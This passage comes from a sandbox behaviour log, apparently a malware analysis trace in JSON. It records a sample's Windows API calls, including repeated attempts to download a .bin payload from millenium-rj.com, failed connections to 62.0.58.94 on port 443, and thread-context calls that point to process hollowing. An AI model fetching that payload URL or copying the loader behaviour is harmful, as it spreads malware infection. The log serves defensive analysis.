"\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1552 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1553 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcao\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1554 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1555 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1556 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1557 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1558 }, { "timestamp": "2025-02-27 23:36:02,081", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1559 }, { "timestamp": "2025-02-27 23:36:06,097", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" } ], "repeated": 0, "id": 1560 }, { "timestamp": "2025-02-27 23:36:06,097", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1561 }, { "timestamp": "2025-02-27 23:36:06,097", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0068" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1562 }, { "timestamp": "2025-02-27 23:36:06,097", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1563 }, { "timestamp": "2025-02-27 23:36:06,097", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1564 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc006c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1565 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1566 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc006c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1567 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1568 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004f4", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1268" } ], "repeated": 0, "id": 1569 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004f4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1570 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004f4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1571 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1268" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1572 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004f4" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcar\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1573 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1268" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1574 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004f4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1575 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004f4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1576 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1268" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1577 }, { "timestamp": "2025-02-27 23:36:07,112", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1268" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1578 }, { "timestamp": "2025-02-27 23:36:09,144", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1579 }, { "timestamp": "2025-02-27 23:36:09,144", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1268" } ], "repeated": 0, "id": 1580 }, { "timestamp": "2025-02-27 23:36:09,144", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1581 }, { "timestamp": "2025-02-27 23:36:09,144", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc006c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1582 }, { "timestamp": "2025-02-27 23:36:09,144", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1583 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1584 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0070", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1585 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1586 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0070" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1587 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000500" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1588 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000508" } ], "repeated": 0, "id": 1589 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000050c" } ], "repeated": 0, "id": 1590 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1591 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004fc" } ], "repeated": 0, "id": 1592 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004f8" } ], "repeated": 0, "id": 1593 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000500" } ], "repeated": 0, "id": 1594 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000504" } ], "repeated": 0, "id": 1595 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1596 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000504", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1284" } ], "repeated": 0, "id": 1597 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000504" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1598 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000504" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1599 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1284" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1600 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000504" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcas\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1601 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1284" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1602 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000504" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1603 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000504" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1604 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1284" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1605 }, { "timestamp": "2025-02-27 23:36:10,159", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1284" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1606 }, { "timestamp": "2025-02-27 23:36:14,175", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1284" } ], "repeated": 0, "id": 1607 }, { "timestamp": "2025-02-27 23:36:14,175", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 8, "id": 1608 }, { "timestamp": "2025-02-27 23:36:14,175", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0070" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1609 }, { "timestamp": "2025-02-27 23:36:14,175", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1610 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1611 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0074", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1612 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1613 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0074" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1614 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1615 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000518", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1304" } ], "repeated": 0, "id": 1616 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1617 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1618 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1619 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcav\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1620 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1304" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1621 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1622 }, { "timestamp": "2025-02-27 23:36:15,191", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000518" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 